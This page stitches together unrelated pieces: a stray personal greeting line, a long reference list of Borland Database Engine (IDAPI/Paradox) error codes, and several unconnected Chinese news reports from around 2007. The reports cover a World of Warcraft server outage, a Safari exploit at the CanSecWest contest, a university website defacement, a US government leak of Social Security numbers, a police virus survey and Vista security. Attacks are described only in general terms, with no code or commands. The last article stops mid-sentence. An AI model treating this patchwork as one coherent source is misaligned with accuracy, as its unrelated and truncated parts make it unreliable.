老婆，起床啦　劲哥哥

$0021 (33) = System Error

$0022 (34) = Object of Interest Not Found

$0023 (35) = Physical Data Corruption

$0024 (36) = I/O Related Error

$0025 (37) = Resource or Limit Error

$0026 (38) = Data Integrity Violation

$0027 (39) = Invalid Request

$0028 (40) = Lock Violation

$0029 (41) = Access/Security Violation

$002A (42) = Invalid Context

$002B (43) = OS Error

$002C (44) = Network Error

$002D (45) = Optional Parameter

$002E (46) = Query Processor

$002F (47) = Version Mismatch

$0030 (48) = Capability Not Supported

$0031 (49) = System Configuration Error

$0032 (50) = Warning

$0033 (51) = Miscellaneous

$0034 (52) = Compatibility Error

$003E (62) = Driver Specific Error

$003F (63) = Internal Symbol

$2101 (8449) = Cannot open a system file.

$2102 (8450) = I/O error on a system file.

$2103 (8451) = Data structure corruption.

$2104 (8452) = Cannot find Engine configuration file.

$2105 (8453) = Cannot write to Engine configuration file.

$2106 (8454) = Cannot initialize with different configuration file.

$2107 (8455) = System has been illegally re-entered.

$2108 (8456) = Cannot locate IDAPI32 .DLL.

$2109 (8457) = Cannot load IDAPI32 .DLL.

$210A (8458) = Cannot load an IDAPI service library.

$210B (8459) = Cannot create or open temporary file.

$2201 (8705) = At beginning of table.

$2202 (8706) = At end of table.

$2203 (8707) = Record moved because key value changed.

$2204 (8708) = Record/Key deleted.

$2205 (8709) = No current record.

$2206 (8710) = Could not find record.

$2207 (8711) = End of BLOB.

$2208 (8712) = Could not find object.

$2209 (8713) = Could not find family member.

$220A (8714) = BLOB file is missing.

$220B (8715) = Could not find language driver.

$2301 (8961) = Corrupt table/index header.

$2302 (8962) = Corrupt file - other than header.

$2303 (8963) = Corrupt Memo/BLOB file.

$2305 (8965) = Corrupt index.

$2306 (8966) = Corrupt lock file.

$2307 (8967) = Corrupt family file.

$2308 (8968) = Corrupt or missing .VAL file.

$2309 (8969) = Foreign index file format.

$2401 (9217) = Read failure.

$2402 (9218) = Write failure.

$2403 (9219) = Cannot access directory.

$2404 (9220) = File Delete operation failed.

$2405 (9221) = Cannot access file.

$2406 (9222) = Access to table disabled because of previous error.

$2501 (9473) = Insufficient memory for this operation.

$2502 (9474) = Not enough file handles.

$2503 (9475) = Insufficient disk space.

$2504 (9476) = Temporary table resource limit.

$2505 (9477) = Record size is too big for table.

$2506 (9478) = Too many open cursors.

$2507 (9479) = Table is full.

$2508 (9480) = Too many sessions from this workstation.

$2509 (9481) = Serial number limit (Paradox).

$250A (9482) = Some internal limit (see context).

$250B (9483) = Too many open tables.

$250C (9484) = Too many cursors per table.

$250D (9485) = Too many record locks on table.

$250E (9486) = Too many clients.

$250F (9487) = Too many indexes on table.

$2510 (9488) = Too many sessions.

$2511 (9489) = Too many open databases.

$2512 (9490) = Too many passwords.

$2513 (9491) = Too many active drivers.

$2514 (9492) = Too many fields in Table Create.

$2515 (9493) = Too many table locks.

$2516 (9494) = Too many open BLOBs.

$2517 (9495) = Lock file has grown too large.

$2518 (9496) = Too many open queries.

$251A (9498) = Too many BLOBs.

$251B (9499) = File name is too long for a Paradox version 5.0 table.

$251C (9500) = Row fetch limit exceeded.

$251D (9501) = Long name not allowed for this tablelevel.

$2601 (9729) = Key violation.

$2602 (9730) = Minimum validity check failed.

$2603 (9731) = Maximum validity check failed.

$2604 (9732) = Field value required.

$2605 (9733) = Master record missing.

$2606 (9734) = Master has detail records. Cannot delete or modify.

$2607 (9735) = Master table level is incorrect.

$2608 (9736) = Field value out of lookup table range.

$2609 (9737) = Lookup Table Open operation failed.

$260A (9738) = Detail Table Open operation failed.

$260B (9739) = Master Table Open operation failed.

$260C (9740) = Field is blank.

$260D (9741) = Link to master table already defined.

$260E (9742) = Master table is open.

$260F (9743) = Detail table(s) exist.

$2610 (9744) = Master has detail records. Cannot empty it.

$2611 (9745) = Self referencing referential integrity must be entered one at a time with no other changes to the table

$2612 (9746) = Detail table is open.

$2613 (9747) = Cannot make this master a detail of another table if its details are not empty.

$2614 (9748) = Referential integrity fields must be indexed.

$2615 (9749) = A table linked by referential integrity requires password to open.

$2616 (9750) = Field(s) linked to more than one master.

$2617 (9751) = Expression validity check failed.

$2701 (9985) = Number is out of range.

$2702 (9986) = Invalid parameter.

$2703 (9987) = Invalid file name.

$2704 (9988) = File does not exist.

$2705 (9989) = Invalid option.

$2706 (9990) = Invalid handle to the function.

$2707 (9991) = Unknown table type.

$2708 (9992) = Cannot open file.

$2709 (9993) = Cannot redefine primary key.

$270A (9994) = Cannot change this RINTDesc.

$270B (9995) = Foreign and primary key do not match.

$270C (9996) = Invalid modify request.

$270D (9997) = Index does not exist.

$270E (9998) = Invalid offset into the BLOB.

$270F (9999) = Invalid descriptor number.

$2710 (10000) = Invalid field type.

$2711 (10001) = Invalid field descriptor.

$2712 (10002) = Invalid field transformation.

$2713 (10003) = Invalid record structure.

$2714 (10004) = Invalid descriptor.

$2715 (10005) = Invalid array of index descriptors.

$2716 (10006) = Invalid array of validity check descriptors.

$2717 (10007) = Invalid array of referential integrity descriptors.

$2718 (10008) = Invalid ordering of tables during restructure.

$2719 (10009) = Name not unique in this context.

$271A (10010) = Index name required.

$271B (10011) = Invalid session handle.

$271C (10012) = invalid restructure operation.

$271D (10013) = Driver not known to system.

$271E (10014) = Unknown database.

$271F (10015) = Invalid password given.

$2720 (10016) = No callback function.

$2721 (10017) = Invalid callback buffer length.

$2722 (10018) = Invalid directory.

$2723 (10019) = Translate Error. Value out of bounds.

$2724 (10020) = Cannot set cursor of one table to another.

$2725 (10021) = Bookmarks do not match table.

$2726 (10022) = Invalid index/tag name.

$2727 (10023) = Invalid index descriptor.

$2728 (10024) = Table does not exist.

$2729 (10025) = Table has too many users.

$272A (10026) = Cannot evaluate Key or Key does not pass filter condition.

$272B (10027) = Index already exists.

$272C (10028) = Index is open.

$272D (10029) = Invalid BLOB length.

$272E (10030) = Invalid BLOB handle in record buffer.

$272F (10031) = Table is open.

$2730 (10032) = Need to do (hard) restructure.

$2731 (10033) = Invalid mode.

$2732 (10034) = Cannot close index.

$2733 (10035) = Index is being used to order table.

$2734 (10036) = Unknown user name or password.

$2735 (10037) = Multi-level cascade is not supported.

$2736 (10038) = Invalid field name.

$2737 (10039) = Invalid table name.

$2738 (10040) = Invalid linked cursor expression.

$2739 (10041) = Name is reserved.

$273A (10042) = Invalid file extension.

$273B (10043) = Invalid language Driver.

$273C (10044) = Alias is not currently opened.

$273D (10045) = Incompatible record structures.

$273E (10046) = Name is reserved by DOS.

$273F (10047) = Destination must be indexed.

$2740 (10048) = Invalid index type

$2741 (10049) = Language Drivers of Table and Index do not match

$2742 (10050) = Filter handle is invalid

$2743 (10051) = Invalid Filter

$2744 (10052) = Invalid table create request

$2745 (10053) = Invalid table delete request

$2746 (10054) = Invalid index create request

$2747 (10055) = Invalid index delete request

$2748 (10056) = Invalid table specified

$274A (10058) = Invalid Time.

$274B (10059) = Invalid Date.

$274C (10060) = Invalid Datetime

$274D (10061) = Tables in different directories

$274E (10062) = Mismatch in the number of arguments

$274F (10063) = Function not found in service library.

$2750 (10064) = Must use baseorder for this operation.

$2751 (10065) = Invalid procedure name

$2752 (10066) = The field map is invalid.

$2801 (10241) = Record locked by another user.

$2802 (10242) = Unlock failed.

$2803 (10243) = Table is busy.

$2804 (10244) = Directory is busy.

$2805 (10245) = File is locked.

$2806 (10246) = Directory is locked.

$2807 (10247) = Record already locked by this session.

$2808 (10248) = Object not locked.

$2809 (10249) = Lock time out.

$280A (10250) = Key group is locked.

$280B (10251) = Table lock was lost.

$280C (10252) = Exclusive access was lost.

$280D (10253) = Table cannot be opened for exclusive use.

$280E (10254) = Conflicting record lock in this session.

$280F (10255) = A deadlock was detected.

$2810 (10256) = A user transaction is already in progress.

$2811 (10257) = No user transaction is currently in progress.

$2812 (10258) = Record lock failed.

$2813 (10259) = Couldn‘t perform the edit because another user changed the record.

$2814 (10260) = Couldn‘t perform the edit because another user deleted or moved the record.

$2901 (10497) = Insufficient field rights for operation.

$2902 (10498) = Insufficient table rights for operation. Password required.

$2903 (10499) = Insufficient family rights for operation.

$2904 (10500) = This directory is read only.

$2905 (10501) = Database is read only.

$2906 (10502) = Trying to modify read-only field.

$2907 (10503) = Encrypted dBASE tables not supported.

$2908 (10504) = Insufficient SQL rights for operation.

$2A01 (10753) = Field is not a BLOB.

$2A02 (10754) = BLOB already opened.

$2A03 (10755) = BLOB not opened.

$2A04 (10756) = Operation not applicable.

$2A05 (10757) = Table is not indexed.

$2A06 (10758) = Engine not initialized.

$2A07 (10759) = Attempt to re-initialize Engine.

$2A08 (10760) = Attempt to mix objects from different sessions.

$2A09 (10761) = Paradox driver not active.

$2A0A (10762) = Driver not loaded.

$2A0B (10763) = Table is read only.

$2A0C (10764) = No associated index.

$2A0D (10765) = Table(s) open. Cannot perform this operation.

$2A0E (10766) = Table does not support this operation.

$2A0F (10767) = Index is read only.

$2A10 (10768) = Table does not support this operation because it is not uniquely indexed.

$2A11 (10769) = Operation must be performed on the current session.

$2A12 (10770) = Invalid use of keyword.

$2A13 (10771) = Connection is in use by another statement.

$2A14 (10772) = Passthrough SQL connection must be shared

$2B01 (11009) = Invalid function number.

$2B02 (11010) = File or directory does not exist.

$2B03 (11011) = Path not found.

$2B04 (11012) = Too many open files. You may need to increase MAXFILEHANDLE limit in IDAPI configuration.

$2B05 (11013) = Permission denied.

$2B06 (11014) = Bad file number.

$2B07 (11015) = Memory blocks destroyed.

$2B08 (11016) = Not enough memory.

$2B09 (11017) = Invalid memory block address.

$2B0A (11018) = Invalid environment.

$2B0B (11019) = Invalid format.

$2B0C (11020) = Invalid access code.

$2B0D (11021) = Invalid data.

$2B0F (11023) = Device does not exist.

$2B10 (11024) = Attempt to remove current directory.

$2B11 (11025) = Not same device.

$2B12 (11026) = No more files.

$2B13 (11027) = Invalid argument.

$2B14 (11028) = Argument list is too long.

$2B15 (11029) = Execution format error.

$2B16 (11030) = Cross-device link.

$2B21 (11041) = Math argument.

$2B22 (11042) = Result is too large.

$2B23 (11043) = File already exists.

$2B27 (11047) = Unknown internal operating system error.

$2B32 (11058) = Share violation.

$2B33 (11059) = Lock violation.

$2B34 (11060) = Critical DOS Error.

$2B35 (11061) = Drive not ready.

$2B64 (11108) = Not exact read/write.

$2B65 (11109) = Operating system network error.

$2B66 (11110) = Error from NOVELL file server.

$2B67 (11111) = NOVELL server out of memory.

$2B68 (11112) = Record already locked by this workstation.

$2B69 (11113) = Record not locked.

$2C01 (11265) = Network initialization failed.

$2C02 (11266) = Network user limit exceeded.

$2C03 (11267) = Wrong .NET file version.

$2C04 (11268) = Cannot lock network file.

$2C05 (11269) = Directory is not private.

$2C06 (11270) = Directory is controlled by other .NET file.

$2C07 (11271) = Unknown network error.

$2C08 (11272) = Not initialized for accessing network files.

$2C09 (11273) = SHARE not loaded. It is required to share local files.

$2C0A (11274) = Not on a network. Not logged in or wrong network driver.

$2C0B (11275) = Lost communication with SQL server.

$2C0D (11277) = Cannot locate or connect to SQL server.

$2C0E (11278) = Cannot locate or connect to network server.

$2D01 (11521) = Optional parameter is required.

$2D02 (11522) = Invalid optional parameter.

$2E01 (11777) = obsolete

$2E02 (11778) = obsolete

$2E03 (11779) = Ambiguous use of ! (inclusion operator).

$2E04 (11780) = obsolete

$2E05 (11781) = obsolete

$2E06 (11782) = A SET operation cannot be included in its own grouping.

$2E07 (11783) = Only numeric and date/time fields can be averaged.

$2E08 (11784) = Invalid expression.

$2E09 (11785) = Invalid or expression.

$2E0A (11786) = obsolete

$2E0B (11787) = bitmap

$2E0C (11788) = CALC expression cannot be used in Insert, Delete, CHANGETO and SET rows.

$2E0D (11789) = Type error in CALC expression.

$2E0E (11790) = CHANGETO can be used in only one query form at a time.

$2E0F (11791) = Cannot modify CHANGED table.

$2E10 (11792) = A field can contain only one CHANGETO expression.

$2E11 (11793) = A field cannot contain more than one expression to be inserted.

$2E12 (11794) = obsolete

$2E13 (11795) = CHANGETO must be followed by the new value for the field.

$2E14 (11796) = Checkmark or CALC expressions cannot be used in FIND queries.

$2E15 (11797) = Cannot perform operation on CHANGED table together with a CHANGETO query.

$2E16 (11798) = chunk

$2E17 (11799) = More than 255 fields in ANSWER table.

$2E18 (11800) = AS must be followed by the name for the field in the ANSWER table.

$2E19 (11801) = Delete can be used in only one query form at a time.

$2E1A (11802) = Cannot perform operation on DeleteD table together with a Delete query.

$2E1B (11803) = Cannot delete from the DeleteD table.

$2E1C (11804) = Example element is used in two fields with incompatible types or with a BLOB.

$2E1D (11805) = Cannot use example elements in an or expression.

$2E1E (11806) = Expression in this field has the wrong type.

$2E1F (11807) = Extra comma found.

$2E20 (11808) = Extra or found.

$2E21 (11809) = One or more query rows do not contribute to the ANSWER.

$2E22 (11810) = FIND can be used in only one query form at a time.

$2E23 (11811) = FIND cannot be used with the ANSWER table.

$2E24 (11812) = A row with GROUPBY must contain SET operations.

$2E25 (11813) = GROUPBY can be used only in SET rows.

$2E26 (11814) = Use only Insert, Delete, SET or FIND in leftmost column.

$2E27 (11815) = Use only one Insert, Delete, SET or FIND per line.

$2E28 (11816) = Syntax error in expression.

$2E29 (11817) = Insert can be used in only one query form at a time.

$2E2A (11818) = Cannot perform operation on InsertED table together with an Insert query.

$2E2B (11819) = Insert, Delete, CHANGETO and SET rows may not be checked.

$2E2C (11820) = Field must contain an expression to insert (or be blank).

$2E2D (11821) = Cannot insert into the InsertED table.

$2E2E (11822) = Variable is an array and cannot be accessed.

$2E2F (11823) = Label

$2E30 (11824) = Rows of example elements in CALC expression must be linked.

$2E31 (11825) = Variable name is too long.

$2E32 (11826) = Query may take a long time to process.

$2E33 (11827) = Reserved word or one that can‘t be used as a variable name.

$2E34 (11828) = Missing comma.

$2E35 (11829) = Missing ).

$2E36 (11830) = Missing right quote.

$2E37 (11831) = Cannot specify duplicate column names.

$2E38 (11832) = Query has no checked fields.

$2E39 (11833) = Example element has no defining occurrence.

$2E3A (11834) = No grouping is defined for SET operation.

$2E3B (11835) = Query makes no sense.

$2E3C (11836) = Cannot use patterns in this context.

$2E3D (11837) = Date does not exist.

$2E3E (11838) = Variable has not been assigned a value.

$2E3F (11839) = Invalid use of example element in summary expression.

$2E40 (11840) = Incomplete query statement. Query only contains a SET definition.

$2E41 (11841) = Example element with ! makes no sense in expression.

$2E42 (11842) = Example element cannot be used more than twice with a ! query.

$2E43 (11843) = Row cannot contain expression.

$2E44 (11844) = obsolete

$2E45 (11845) = obsolete

$2E46 (11846) = No permission to insert or delete records.

$2E47 (11847) = No permission to modify field.

$2E48 (11848) = Field not found in table.

$2E49 (11849) = Expecting a column separator in table header.

$2E4A (11850) = Expecting a column separator in table.

$2E4B (11851) = Expecting column name in table.

$2E4C (11852) = Expecting table name.

$2E4D (11853) = Expecting consistent number of columns in all rows of table.

$2E4E (11854) = Cannot open table.

$2E4F (11855) = Field appears more than once in table.

$2E50 (11856) = This Delete, CHANGE or Insert query has no ANSWER.

$2E51 (11857) = Query is not prepared. Properties unknown.

$2E52 (11858) = Delete rows cannot contain quantifier expression.

$2E53 (11859) = Invalid expression in Insert row.

$2E54 (11860) = Invalid expression in Insert row.

$2E55 (11861) = Invalid expression in SET definition.

$2E56 (11862) = row use

$2E57 (11863) = SET keyword expected.

$2E58 (11864) = Ambiguous use of example element.

$2E59 (11865) = obsolete

$2E5A (11866) = obsolete

$2E5B (11867) = Only numeric fields can be summed.

$2E5C (11868) = Table is write protected.

$2E5D (11869) = Token not found.

$2E5E (11870) = Cannot use example element with ! more than once in a single row.

$2E5F (11871) = Type mismatch in expression.

$2E60 (11872) = Query appears to ask two unrelated questions.

$2E61 (11873) = Unused SET row.

$2E62 (11874) = Insert, Delete, FIND, and SET can be used only in the leftmost column.

$2E63 (11875) = CHANGETO cannot be used with Insert, Delete, SET or FIND.

$2E64 (11876) = Expression must be followed by an example element defined in a SET.

$2E65 (11877) = Lock failure.

$2E66 (11878) = Expression is too long.

$2E67 (11879) = Refresh exception during query.

$2E68 (11880) = Query canceled.

$2E69 (11881) = Unexpected Database Engine error.

$2E6A (11882) = Not enough memory to finish operation.

$2E6B (11883) = Unexpected exception.

$2E6C (11884) = Feature not implemented yet in query.

$2E6D (11885) = Query format is not supported.

$2E6E (11886) = Query string is empty.

$2E6F (11887) = Attempted to prepare an empty query.

$2E70 (11888) = Buffer too small to contain query string.

$2E71 (11889) = Query was not previously parsed or prepared.

$2E72 (11890) = Function called with bad query handle.

$2E73 (11891) = QBE syntax error.

$2E74 (11892) = Query extended syntax field count error.

$2E75 (11893) = Field name in sort or field clause not found.

$2E76 (11894) = Table name in sort or field clause not found.

$2E77 (11895) = Operation is not supported on BLOB fields.

$2E78 (11896) = General BLOB error.

$2E79 (11897) = Query must be restarted.

$2E7A (11898) = Unknown answer table type.

$2E96 (11926) = Blob cannot be used as grouping field.

$2E97 (11927) = Query properties have not been fetched.

$2E98 (11928) = Answer table is of unsuitable type.

$2E99 (11929) = Answer table is not yet supported under server alias.

$2E9A (11930) = Non-null blob field required. Can‘t insert records

$2E9B (11931) = Unique index required to perform changeto

$2E9C (11932) = Unique index required to delete records

$2E9D (11933) = Update of table on the server failed.

$2E9E (11934) = Can‘t process this query remotely.

$2E9F (11935) = Unexpected end of command.

$2EA0 (11936) = Parameter not set in query string.

$2EA1 (11937) = Query string is too long.

$2EAA (11946) = No such table or correlation name.

$2EAB (11947) = Expression has ambiguous data type.

$2EAC (11948) = Field in order by must be in result set.

$2EAD (11949) = General parsing error.

$2EAE (11950) = Record or field constraint failed.

$2EAF (11951) = When GROUP BY exists, every simple field in projectors must be in GROUP BY.

$2EB0 (11952) = User defined function is not defined.

$2EB1 (11953) = Unknown error from User defined function.

$2EB2 (11954) = Single row subquery produced more than one row.

$2EB3 (11955) = Expressions in group by are not supported.

$2EB4 (11956) = Queries on text or ascii tables is not supported.

$2EB5 (11957) = ANSI join keywords USING and NATURAL are not supported in this release.

$2EB6 (11958) = Select DISTINCT may not be used with UNION unless UNION ALL is used.

$2EB7 (11959) = GROUP BY is required when both aggregate and non-aggregate fields are used in result set.

$2EB8 (11960) = Insert and Update operations are not supported on autoincrement field type.

$2EB9 (11961) = Update on Primary Key of a Master Table may modify more than one record.

$2EBA (11962) = Queries on MS ACCESS tables are not supported by local query engines.

$2EBB (11963) = Preparation of field-level constraint failed.

$2EBC (11964) = Preparation of field default failed.

$2EBD (11965) = Preparation of record-level constraint failed.

$2EC4 (11972) = Constraint Failed. Expression:

$2F01 (12033) = Interface mismatch. Engine version different.

$2F02 (12034) = Index is out of date.

$2F03 (12035) = Older version (see context).

$2F04 (12036) = .VAL file is out of date.

$2F05 (12037) = BLOB file version is too old.

$2F06 (12038) = Query and Engine DLLs are mismatched.

$2F07 (12039) = Server is incompatible version.

$2F08 (12040) = Higher table level required

$3001 (12289) = Capability not supported.

$3002 (12290) = Not implemented yet.

$3003 (12291) = SQL replicas not supported.

$3004 (12292) = Non-blob column in table required to perform operation.

$3005 (12293) = Multiple connections not supported.

$3006 (12294) = Full dBASE expressions not supported.

$3101 (12545) = Invalid database alias specification.

$3102 (12546) = Unknown database type.

$3103 (12547) = Corrupt system configuration file.

$3104 (12548) = Network type unknown.

$3105 (12549) = Not on the network.

$3106 (12550) = Invalid configuration parameter.

$3201 (12801) = Object implicitly dropped.

$3202 (12802) = Object may be truncated.

$3203 (12803) = Object implicitly modified.

$3204 (12804) = Should field constraints be checked?

$3205 (12805) = Validity check field modified.

$3206 (12806) = Table level changed.

$3207 (12807) = Copy linked tables?

$3209 (12809) = Object implicitly truncated.

$320A (12810) = Validity check will not be enforced.

$320B (12811) = Multiple records found, but only one was expected.

$320C (12812) = Field will be trimmed, cannot put master records into PROBLEM table.

$3301 (13057) = File already exists.

$3302 (13058) = BLOB has been modified.

$3303 (13059) = General SQL error.

$3304 (13060) = Table already exists.

$3305 (13061) = Paradox 1.0 tables are not supported.

$3306 (13062) = Update aborted.

$3401 (13313) = Different sort order.

$3402 (13314) = Directory in use by earlier version of Paradox.

$3403 (13315) = Needs Paradox 3.5-compatible language driver.

$3501 (13569) = Data Dictionary is corrupt

$3502 (13570) = Data Dictionary Info Blob corrupted

$3503 (13571) = Data Dictionary Schema is corrupt

$3504 (13572) = Attribute Type exists

$3505 (13573) = Invalid Object Type

$3506 (13574) = Invalid Relation Type

$3507 (13575) = View already exists

$3508 (13576) = No such View exists

$3509 (13577) = Invalid Record Constraint

$350A (13578) = Object is in a Logical DB

$350B (13579) = Dictionary already exists

$350C (13580) = Dictionary does not exist

$350D (13581) = Dictionary database does not exist

$350E (13582) = Dictionary info is out of date - needs Refresh

$3510 (13584) = Invalid Dictionary Name

$3511 (13585) = Dependent Objects exist

$3512 (13586) = Too many Relationships for this Object Type

$3513 (13587) = Relationships to the Object exist

$3514 (13588) = Dictionary Exchange File is corrupt

$3515 (13589) = Dictionary Exchange File Version mismatch

$3516 (13590) = Dictionary Object Type Mismatch

$3517 (13591) = Object exists in Target Dictionary

$3518 (13592) = Cannot access Data Dictionary

$3519 (13593) = Cannot create Data Dictionary

$351A (13594) = Cannot open Database

$3E01 (15873) = Wrong driver name.

$3E02 (15874) = Wrong system version.

$3E03 (15875) = Wrong driver version.

$3E04 (15876) = Wrong driver type.

$3E05 (15877) = Cannot load driver.

$3E06 (15878) = Cannot load language driver.

$3E07 (15879) = Vendor initialization failed.

$3E08 (15880) = Your application is not enabled for use with this driver.

$3F01 (16129) = Query By Example

$3F02 (16130) = SQL Generator

$3F03 (16131) = IDAPI

$3F04 (16132) = Lock Manager

$3F05 (16133) = SQL Driver

$3F06 (16134) = IDAPI Services

$3F07 (16135) = dBASE Driver

$3F08 (16136) = Dictionary Manager

$3F0B (16139) = Token

$3F0D (16141) = Table

$3F0E (16142) = Field

$3F0F (16143) = Image

$3F10 (16144) = User

$3F11 (16145) = File

$3F12 (16146) = Index

$3F13 (16147) = Directory

$3F14 (16148) = Key

$3F15 (16149) = Alias

$3F16 (16150) = Drive

$3F17 (16151) = Server error

$3F18 (16152) = Server message

$3F19 (16153) = Line Number

$3F1A (16154) = Capability

$3F1B (16155) = Dictionary

$3F1D (16157) = Object

$3F1E (16158) = Limit

$3F1F (16159) = Expression

$3F70 (16240) = WORK

$3F71 (16241) = PRIV

$3F72 (16242) = Records copied

$3F73 (16243) = Records appended

$3F74 (16244) = LineNo

$3F75 (16245) = Line

当然不会有这样的事情，只是部分服务器出现了故障，目前我们已经找到了原因，并且正在积极修复，现在基本已经不会对《魔兽世界》玩家有任何影响，通常这样的问题九城都会在48小时以内解决。”第九城市发言人赵雨润回复说。
　　昨天下午有部分《魔兽世界》玩家反映，魔兽世界一区无法登录。当晚上九城对外公布称魔兽世界一区部分服务器出现异常，进入紧急停机维护状态。而在坊间一度传言九城机房昨晚9:45发生火灾并出现爆炸，玩家人物资料全部丢失，九城财产损失3500万以上。
　　对于上述言论赵雨润给出了否定的回复。他同时表示，关于火灾完全是不切实际的传言。对于服务器发生的问题，九城正在积极恢复中，但处于商业角度九城不会公布故障的具体原因。但玩家的资料九城都有备份，不会出现丢失的现象，请《魔兽世界》的用户放心。
　　另据资料显示九城的服务器的采取分散式分布，在国内的大部分地区都架有《魔兽世界》服务器，这样的布阵方式也在一定意义上降低游戏大面积出现运营故障的机率题。
　　目前九城运营的《魔兽世界》是中国最受欢迎的网络游戏之一。注册用户超过63万。2006年第三季度，《魔兽世界》最高同时在线用户是59.5万，平均同时在线用户人数为28万，两个数字都是前国内网游市场的第一。
　　第九城市有关“《魔兽世界》第一大区部分服务器因发生意外故障”的官方声明如下：
　　一）昨天（4月24日）晚22:21，《魔兽世界》第一大区部分服务器因发生意外故障，第九城市运营团队当即采取了需紧急停机维护。到今天（4月25日）上午10:15 第九城市运营团队已经顺利排查出故障原因, 目前正在紧急修复中。预计修复工作全部完成还需要一段时间，请玩家们耐心等待。也请随时关注《魔兽世界》中文官方网站的最新进展情况更新。
　　二）有关《魔兽世界》第一大区的部分服务器的意外故障是属于“技术事件”。而某些网络媒体所做 “由外力造成”的猜测纯属谣言，请勿偏听偏信。

在北美洲范库弗峰举行的CanSecWest安全会议上，一黑客成功入侵Mac系统并因此获得10，000美元的奖金。
　　在此次中，获奖的黑客暴露了Apple的Safari浏览器中的一个漏洞。CanSecWest其中一位组织者表示，目前所有OS X系统都受这个隐患影响。
　　会议的组织者为了引起人们对Mac系统安全的注意而举办了这个竞赛。CanSecWest安全会议主要负责人Dragos Ruiu表示，很多使用OS X系统的用户都认为系统非常安全，而实际上微软在安全方面做的工作比Apple多很多。
　　比赛之初，大会要求参赛者通过无线AP访问两台Mac中的任意一台，这两台Mac电脑都没有运行任何程序。因为没有黑客成功入侵，所以大会允许参赛者可以通过电子邮件发送URL来通过浏览器入侵。
　　来自纽约的Dino Di Zovie通过发送利用这个漏洞的URL成功入侵。Comeau表示，虽然这个URL打开的是空白页面，但它暴露了Safari处理输入时存在的隐患。攻击者可以通过很多方式来利用此隐患，Dino Di Zovie利用这隐患开放了后门并成功的获得系统的无限访问权。
　　所幸大会不会公布这个漏洞，而设立此比赛奖金的3Com TippingPoint分部将会负责把情况反馈给Apple。
　　TippingPoint安全响应中心的经理Terri Forslof表示，Mac之所以没有被攻击者大量攻击的原因之一是Mac数量不多，Mac远远不如Windows系统那么使用广泛。

新京报
昨晚，北京邮电大学网站遭黑客攻击，自称“ZHOUZEJIE”的黑客在首页留下信息，称网站存在漏洞，请管理员尽快修补。
昨晚9时许， 记者登录北京邮电大学网站首页www. bupt.edu.cn，网页标题为“此站被黑”，页面大字显示“为什么受伤的人总是我？？？”并有滚动信息称“管理员，你好，你的网站存在安全漏洞，请尽快修补漏洞，以免别人进来给你造成不必要的损失，如果有什么问题请与我联系”，落款为“ZHOUZEJIE，CHINAHACKER(中国黑客)”，还留下电子邮箱地址和QQ号。北邮网站下属的栏目则无法打开。
黑客留下的QQ号用户资料显示职业为学生，来自广东汕头，18岁。资料称“天赋异能，谁与争峰，你的电脑，我的权限，你的网站，我的后台，通往计算机的路不止一条，在攻与防的对立统一中寻求突破，做一个名副其实的黑客”。
QQ显示不在线，记者发送消息也未获回应。
昨晚8时50分，北邮学生论坛上开始有帖子反映此事，学生认为，这样的事“丢脸”，有损北邮“信息黄埔”的称号，呼吁学校信息安全中心赶紧找人管管。另一篇由信息安全版版主发布的帖子则提醒，被黑后的主页可能存在病毒。
昨晚，记者拨打北邮校园网值班电话，自动提示音称已经下班。晚上10时，北邮网站地址已经不指向黑客留言的页面，但仍未恢复正常。

赛迪网

据最新消息，数千名接受美国“农业部”项目资助的公民，社会安全号码被发布在互联网上，值得关注的是，该信息甚至在该网站上泄漏长达数年之久，从而引起人们对互联网隐私权的思考。

据CNET报道，这些个人数据本应归美国农业部和人口统计局保管，然而在数年的泄漏过程中，任何互联网浏览者都可以自由登陆数据库进行浏览。“如果你把我的名字输入Google，就会轻易发现我的个人社会安全号码，这确实让我感到头疼。”一位受害者表示。

据悉目前通过这一环节泄漏的个人社会安全号码多达三万个。虽然目前没有证据表明，该数据被用于非正当目的，然而在事情爆发之后，美国农业部和人口统计局仍然迅速将数据从互联网上删除。

另一方面，美国农业部发言人表示，目前该危险可能波及到的用户总数，高达10到15万人。目前人口统计局发言人拒绝对该事件发表评论。

隐私权倡导者表示，政府所采用的保护措施根本不够，要知道目前使用的数据库技术几乎有20年历史了，然而依然被联邦政府使用。然而另一方面，分析师也表示，数据库技术有助于政府提高透明度。

实际上，农业部和人口统计局的数据泄漏已经不是美国政府部门第一次事故了，在此之前还可非法入侵了农业部数据库，盗窃了大量部门工作人员的社会安全号码和个人信息，甚至包括照片

公安部
为掌握我国信息网络安全和计算机病毒疫情现状，普及信息网络安全知识，进一步提高广大用户安全防范意识，公安部公共信息网络安全监察局定于4月25日至6月30日组织开展2007年度全国信息网络安全状况和计算机病毒疫情调查活动。
此次调查对象主要是重要信息系统运行管理和使用单位、互联网接入服务、信息服务单位和联网单位。主要调查内容为：2006年5月至2007年5月，我国联网单位发生网络安全事件的次数、种类、造成的损失等情况，以及我国计算机用户感染病毒的次数、种类、感染途径等。

本次调查在新浪网（tech.sina.com.cn/focus/survey_07/index.shtml ）、国家反计算机入侵和防病毒研究中心网站（www.aiav.com.cn）和国家计算机病毒应急处理中心网站（www.antivirus-china.org.cn）上设有调查专栏，并在新浪网上开展网络安全和病毒防治知识宣传。同时，河北、江苏、浙江、山东、广东五个省市将直接面向用户开展问卷调查。
此次调查活动由公安部公共信息网络安全监察局主办，各省区市公安厅、局公共信息网络安全监察部门、国家计算机病毒应急处理中心、国家反计算机入侵和防病毒研究中心、新浪网站承办，国内主要计算机病毒防治厂商协办。调查结束后，公安部公共信息网络安全监察局将公布调查报告和调查活动参与者获奖名单，欢迎广大计算机用户登录以上三个网站参加调查。

微软一直把Vista的安全功能作为卖点加以宣传，并称Vista的安全性比XP有了长足的进步，但某位顶尖的安全专家则警告用户，他表示Vista的安全性并没有多少改变。
　　在CanSecWest安全大会上，微软平台与服务分部的Mark Russinovich表示，黑客与病毒作者很快就会适应Vista的新框架。
　　他指出，虽然Vista的UAC（用户帐户控制）技术能够禁止恶意软件对操作系统进行修改，但这并不是一个安全屏障。
　　Russinovich预测未来的恶意软件将能够自我进化，并会欺骗用户点击“允许”按钮来准许其运行

